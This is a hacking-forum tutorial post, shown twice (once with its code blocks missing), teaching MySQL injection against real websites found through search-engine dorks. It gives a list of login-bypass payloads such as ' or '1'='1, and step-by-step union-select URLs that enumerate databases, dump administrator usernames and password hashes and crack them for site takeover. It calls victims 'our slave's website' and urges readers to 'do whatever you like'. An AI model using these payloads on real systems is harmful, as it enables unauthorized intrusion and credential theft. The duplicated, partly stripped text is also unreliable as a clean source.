[TuT] SQLi - MySQL Injection. - Phizo - 16-01-2012 09:10 AM
Today I will be teaching you guys MySQL injection. This is a basic tutorial, not any advanced methods.
What is MySQL injection?
MySQL injection AKA SQLi is a very common website vulnerability. You can inject MySQL queries into the address bar, and login pages.
What can I accomplish with MySQL injection?
You can view columns and tables within the MySQL database. This is including usernames and passwords, billing information, etc.
Table of content.
#Bypassing the Administrator login.
Finding vulnerable websites.
Using MySQL queries to bypass the Administrator login and gain Administrator privileges.
#Using union based MySQL injection to pull up columns and tables.
Finding vulnerable websites.
Finding out how many columns there is in the database.
Selecting our columns.
Enumerating the the MySQL database for information.
Viewing tables and columns to locate logins.
Cracking the password if not in plain text.
#Bypassing the Administrator login.
I will now teach you how to bypass the Administrator login.
Finding vulnerable websites.
We only need one thing, search engine dorks.
Search engine dorks:
For this tutorial, I will be using "inurl:administratorlogin.asp", use it in a search engine, i.e Google.
Owning the login.
Once we have found our Administrator login we need to put in a MySQL query to bypass the login.
Here is some MySQL queries that we will use to bypass the Administrator login:
I will be using the very top one (' or '1'='1) since I am use to using that one. It doesn't matter which one you use though.
The username should always be: admin (no capitals)
The password should always be: a MySQL query stated above.
So in this case, my login will be:
Username: admin
Password: ' or '1'='1
Once you have found your vulnerable login, it should look a little something like this:
http://img823.imageshack.us/img823/9757/sqli1.png
Once you have logged in as Administrator you will have full access over the website. You can do whatever you like with it.
#Union based MySQL injection.
I will now be showing you a more advanced way, a more common way of hacking websites.
Finding vulnerable websites.
To find vulnerable websites we will need following things:
Exploit scanner: http://www.hackforums.net/showthread.php?tid=941074 - Shows tutorial with download link.
Search engine dorks: http://pastebin.com/NnhPj8SB - (inurl:dorkhere)
Once you have found a site try this: http://site.com/index.php?id=1337' (the ' tests if it's vulnerable, if there is an error, it's vulnerable)
Finding how many columns there are in the database.
Once we have found our website (in this case: http://site.com/index.php?id=1337) we will then inject MySQL queries to find out some relevant information about our slave's website.
Okay, we're at our slave's website. We now want to find out how many columns there is in the database. We will have to determine this by what output we get. This is what you have to do.
Everything besides the (error, no error) must be included. Basically, you must find out which is the lowest number without an error. In this case it's 8. So there is 8 columns in the database.
Selecting the columns
Okay, we have now found out there is 8 columns in the database. We will now need to select those columns to move on.
If you see numbers pop up on the on the webpage, then you can proceed.
Enumerating the MySQL database
Enumeration basically means finding/gathering information. The more information we have on the MySQL database, the easier it will be to exploit.
We want to find the following:
The version of the MySQL database.
How many databases there is.
The slave's username for the MySQL database.
Okay. We see the numbers on the webpage, for this tutorial I will be using "4". It depends what numbers are on the webpage. You need to go to the URL address bar and replace the 4 with a MySQL query.
The MySQL queries we will be using are:
- Determines what MySQL version the database is running.
- Determines the username that our slave uses for the MySQL database.
- Determines what database you are currently viewing.
This will be used as the following:
Version:
User:
Database:
Now pulling up the database(s) is a little more tricky. The databases are known as "schema", this is what our code will look like if we want to pull up the database(s).
We have now located the version, username, and how many databases there is.
Viewing tables and columns.
Version 5
If you came across a version 5 MySQL database, then keep reading this section. If you found a version 4 then scroll down to the next section.
We've found out that our MySQL database is running version 5. Now we want to grab the tables and columns. First we will start with gathering the tables.
The MySQL query to view tables:
We will be looking for tables such as:
Basically just anything that looks like it stores accounts.
Okay, I've found a table called "admin", now we want to view the columns, in this case "logins".
We will need to convert our table "admin" into a hex string. To get the hex string we will need a converter: http://www.swingnote.com/tools/texttohex.php
We put our table in (admin) and we have converted it to hex. This is what our hex string looks like:
We will need to put "0x" infront of it to make it execute properly as a MySQL query. Our hex code will then be "0x61646d696e".
Now since we have our hex code for the admin table, we will now view the columns inside the admin table. This is what our MySQL query will look like.
The code above does make a lot of sense. You are grabbing the column name from information_schema.columns (where the columns are stored) where the table name is admin. So easily put, you're grabbing the columns from the admin table.
The following columns came up on our webpage:
username
password
There are many different types of columns. It could be:
user, userid, member, account, etc.
pass, passwd, pwd, etc.
We now want to write a new MySQL query to view the username(s) and password(s) of our table "admin", our code will be:
The "0x3a" seperates the two columns. Basically, the above query is grabbing the columns' data from the admin table. Therefore, giving us the username and password of the Administrator.
Our output is on our webpage. A username and a hash. The output looks like the following:
The colon (
seperates the username from the password. The password is "21232f297a57a5a743894a0e4a801fc3" while the username is "admin", however, the password is encrypted as a MD5 hash. We now need to crack the hash into a plain text password.
MD5 hash cracker: http://lmgtfy.com/?q=MD5+Hash+Cracker
We have now cracked the MD5 hash (21232f297a57a5a743894a0e4a801fc3) and we have found out what the real password is. The password was "admin". So the username is "admin" and the password is "admin" as well. We can now log into the website as Administrator and do whatever we like with the website.
Version 4
Okay, our MySQL database was 4. This is a lot harder to exploit, but not impossible. If you're a beginner I would recommend just going to find a version 5 database.
We have to guess the tables and columns. There is no information_schema and concat so we cannot use group_concat(). So it requires hard thought and guessing skill.
We already know of some table names and column names. We can now guess to find out the username and password of our target.
The username and password (hash) should be on the webpage if you do manage to guess it. You can then crack it, then login.
I hope you all enjoyed my tutorial. It took me a long time to write.
Happy hacking
.
Today I will be teaching you guys MySQL injection. This is a basic tutorial, not any advanced methods.
What is MySQL injection?
MySQL injection AKA SQLi is a very common website vulnerability. You can inject MySQL queries into the address bar, and login pages.
What can I accomplish with MySQL injection?
You can view columns and tables within the MySQL database. This is including usernames and passwords, billing information, etc.
Table of content.
#Bypassing the Administrator login.
Finding vulnerable websites.
Using MySQL queries to bypass the Administrator login and gain Administrator privileges.
#Using union based MySQL injection to pull up columns and tables.
Finding vulnerable websites.
Finding out how many columns there is in the database.
Selecting our columns.
Enumerating the the MySQL database for information.
Viewing tables and columns to locate logins.
Cracking the password if not in plain text.
#Bypassing the Administrator login.
I will now teach you how to bypass the Administrator login.
Finding vulnerable websites.
We only need one thing, search engine dorks.
Search engine dorks:
Code:
inurl:adminlogin.asp
inurl:administratorlogin.asp
inurl:administrator_login.aspFor this tutorial, I will be using "inurl:administratorlogin.asp", use it in a search engine, i.e Google.
Owning the login.
Once we have found our Administrator login we need to put in a MySQL query to bypass the login.
Here is some MySQL queries that we will use to bypass the Administrator login:
Code:
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'The username should always be: admin (no capitals)
The password should always be: a MySQL query stated above.
So in this case, my login will be:
Username: admin
Password: ' or '1'='1
Once you have found your vulnerable login, it should look a little something like this:
http://img823.imageshack.us/img823/9757/sqli1.png
Once you have logged in as Administrator you will have full access over the website. You can do whatever you like with it.
#Union based MySQL injection.
I will now be showing you a more advanced way, a more common way of hacking websites.
Finding vulnerable websites.
To find vulnerable websites we will need following things:
Exploit scanner: http://www.hackforums.net/showthread.php?tid=941074 - Shows tutorial with download link.
Search engine dorks: http://pastebin.com/NnhPj8SB - (inurl:dorkhere)
Once you have found a site try this: http://site.com/index.php?id=1337' (the ' tests if it's vulnerable, if there is an error, it's vulnerable)
Finding how many columns there are in the database.
Once we have found our website (in this case: http://site.com/index.php?id=1337) we will then inject MySQL queries to find out some relevant information about our slave's website.
Okay, we're at our slave's website. We now want to find out how many columns there is in the database. We will have to determine this by what output we get. This is what you have to do.
Code:
http://site.com/index.php?id=1337 order by 5-- (no error)
http://site.com/index.php?id=1337 order by 10-- (error)
http://site.com/index.php?id=1337 order by 9-- (error)
http://site.com/index.php?id=1337 order by 8-- (no error)Everything besides the (error, no error) must be included. Basically, you must find out which is the lowest number without an error. In this case it's 8. So there is 8 columns in the database.
Selecting the columns
Okay, we have now found out there is 8 columns in the database. We will now need to select those columns to move on.
Code:
http://site.com/index.php?id=-1337 union all select 1,2,3,4,5,6,7,8--If you see numbers pop up on the on the webpage, then you can proceed.
Enumerating the MySQL database
Enumeration basically means finding/gathering information. The more information we have on the MySQL database, the easier it will be to exploit.
We want to find the following:
The version of the MySQL database.
How many databases there is.
The slave's username for the MySQL database.
Okay. We see the numbers on the webpage, for this tutorial I will be using "4". It depends what numbers are on the webpage. You need to go to the URL address bar and replace the 4 with a MySQL query.
Code:
http://site.com/index.php?id=1337 union all select 1,2,3,MYSQLQUERYHERE,5,6,7,8--The MySQL queries we will be using are:
Code:
@@version or version()Code:
user()Code:
database()This will be used as the following:
Version:
Code:
http://site.com/index.php?id=1337 union all select 1,2,3,@@version,5,6,7,8--User:
Code:
http://site.com/index.php?id=1337 union all select 1,2,3,user(),5,6,7,8--Database:
Now pulling up the database(s) is a little more tricky. The databases are known as "schema", this is what our code will look like if we want to pull up the database(s).
Code:
http://site.com/index.php?id=1337 union all select 1,2,3,group_concat(schema_name),5,6,7,8 from information_schemata--We have now located the version, username, and how many databases there is.
Viewing tables and columns.
Version 5
If you came across a version 5 MySQL database, then keep reading this section. If you found a version 4 then scroll down to the next section.
We've found out that our MySQL database is running version 5. Now we want to grab the tables and columns. First we will start with gathering the tables.
The MySQL query to view tables:
Code:
http://site.com/index.php?id=1337 union all select 1,2,3,group_concat(table_name),5,6,7,8 from information_schema.tables--We will be looking for tables such as:
Code:
admin(s), user(s), member(s), admin_tbl, user_tbl, member_tblOkay, I've found a table called "admin", now we want to view the columns, in this case "logins".
We will need to convert our table "admin" into a hex string. To get the hex string we will need a converter: http://www.swingnote.com/tools/texttohex.php
We put our table in (admin) and we have converted it to hex. This is what our hex string looks like:
Code:
61646d696eWe will need to put "0x" infront of it to make it execute properly as a MySQL query. Our hex code will then be "0x61646d696e".
Now since we have our hex code for the admin table, we will now view the columns inside the admin table. This is what our MySQL query will look like.
Code:
http://site.com/index.php?id=1337 union all select 1,2,3,group_concat(column_name),5,6,7,8 from information_schema.columns where table_name=0x61646d696e--The code above does make a lot of sense. You are grabbing the column name from information_schema.columns (where the columns are stored) where the table name is admin. So easily put, you're grabbing the columns from the admin table.
The following columns came up on our webpage:
username
password
There are many different types of columns. It could be:
user, userid, member, account, etc.
pass, passwd, pwd, etc.
We now want to write a new MySQL query to view the username(s) and password(s) of our table "admin", our code will be:
Code:
http://site.com/index.php?id=1337 union all select 1,2,3,group_concat(username,0x3a,password) from admin--The "0x3a" seperates the two columns. Basically, the above query is grabbing the columns' data from the admin table. Therefore, giving us the username and password of the Administrator.
Our output is on our webpage. A username and a hash. The output looks like the following:
Code:
admin:21232f297a57a5a743894a0e4a801fc3The colon (
seperates the username from the password. The password is "21232f297a57a5a743894a0e4a801fc3" while the username is "admin", however, the password is encrypted as a MD5 hash. We now need to crack the hash into a plain text password.MD5 hash cracker: http://lmgtfy.com/?q=MD5+Hash+Cracker
We have now cracked the MD5 hash (21232f297a57a5a743894a0e4a801fc3) and we have found out what the real password is. The password was "admin". So the username is "admin" and the password is "admin" as well. We can now log into the website as Administrator and do whatever we like with the website.
Version 4
Okay, our MySQL database was 4. This is a lot harder to exploit, but not impossible. If you're a beginner I would recommend just going to find a version 5 database.
We have to guess the tables and columns. There is no information_schema and concat so we cannot use group_concat(). So it requires hard thought and guessing skill.
We already know of some table names and column names. We can now guess to find out the username and password of our target.
Code:
http://site.com/index.php?id=1337 union all select 1,2,3,username,0x3a,password,4,5,6,7,8 from admin-- (error)
http://site.com/index.php?id=1337 union all select 1,2,3,user,0x3a,pass,5,6,7,8 from member-- (error)
http://site.com/index.php?id=1337 union all select 1,2,3,userid,0x3a,pass,5,6,7,8 from users-- (page loads with text on screen - no error)The username and password (hash) should be on the webpage if you do manage to guess it. You can then crack it, then login.
I hope you all enjoyed my tutorial. It took me a long time to write.
Happy hacking
. 
কোন মন্তব্য নেই:
একটি মন্তব্য পোস্ট করুন